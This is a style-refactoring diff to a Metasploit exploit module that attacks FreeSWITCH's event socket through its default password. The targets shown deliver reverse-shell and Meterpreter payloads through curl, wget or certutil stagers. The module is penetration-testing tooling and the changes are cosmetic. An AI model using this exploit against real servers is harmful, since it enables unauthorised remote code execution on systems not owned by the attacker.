@@ -36,45 +36,53 @@ class MetasploitModule < Msf::Exploit::Remote
           ['CWE', '260'], # default password, configurable in event_socket.conf.xml
           ['URL', 'https://freeswitch.org/confluence/display/FREESWITCH/mod_event_socket']
         ],
-        'Platform' => %w[win linux unix bsd],
-        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
         'Payload' => { 'BadChars' => "\x00\x0a\x0d\x27\x5c" },
         'CmdStagerFlavor' => %w[curl wget certutil vbs],
         'Targets' => [
           [
             'Unix (In-Memory)',
-            'Platform' => 'unix',
-            'Arch' => ARCH_CMD,
-            'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse' },
-            'Type' => :unix_memory
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse' },
+              'Type' => :unix_memory
+            }
           ],
           [
             'Linux (Dropper)',
-            'Platform' => 'linux',
-            'Arch' => [ARCH_X86, ARCH_X64],
-            'DefaultOptions' => { 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp' },
-            'Type' => :linux_dropper
+            {
+              'Platform' => 'linux',
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'DefaultOptions' => { 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp' },
+              'Type' => :linux_dropper
+            }
           ],
           [
             'PowerShell (In-Memory)',
-            'Platform' => 'win',
-            'Arch' => [ARCH_X86, ARCH_X64],
-            'DefaultOptions' => { 'PAYLOAD' => 'windows/meterpreter/reverse_tcp' },
-            'Type' => :psh_memory
+            {
+              'Platform' => 'win',
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'DefaultOptions' => { 'PAYLOAD' => 'windows/meterpreter/reverse_tcp' },
+              'Type' => :psh_memory
+            }
           ],
           [
             'Windows (In-Memory)',
-            'Platform' => 'win',
-            'Arch' => ARCH_CMD,
-            'DefaultOptions' => { 'PAYLOAD' => 'cmd/windows/reverse_powershell' },
-            'Type' => :win_memory
+            {
+              'Platform' => 'win',
+              'Arch' => ARCH_CMD,
+              'DefaultOptions' => { 'PAYLOAD' => 'cmd/windows/reverse_powershell' },
+              'Type' => :win_memory
+            }
           ],
           [
             'Windows (Dropper)',
-            'Platform' => 'win',
-            'Arch' => [ARCH_X86, ARCH_X64],
-            'DefaultOptions' => { 'PAYLOAD' => 'windows/meterpreter/reverse_tcp' },
-            'Type' => :win_dropper
+            {
+              'Platform' => 'win',
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'DefaultOptions' => { 'PAYLOAD' => 'windows/meterpreter/reverse_tcp' },
+              'Type' => :win_dropper
+            }
           ]
         ],
         'Privileged' => false,
@@ -144,7 +152,7 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     connect
-    banner = sock.get_once.to_s
+    sock.get_once.to_s
 
     auth(datastore['PASSWORD'])
 
@@ -168,13 +176,13 @@ class MetasploitModule < Msf::Exploit::Remote
         cmd_psh_payload(
           payload.encoded,
           payload_instance.arch.first,
-          { :remove_comspec => true, :encode_final_payload => true }
+          { remove_comspec: true, encode_final_payload: true }
         )
       )
     when :linux_dropper
-      execute_cmdstager(:linemax => 1_500)
+      execute_cmdstager(linemax: 1_500)
     when :win_dropper
-      execute_cmdstager(:linemax => 1_500)
+      execute_cmdstager(linemax: 1_500)
     end
   ensure
     disconnect unless sock.nil?
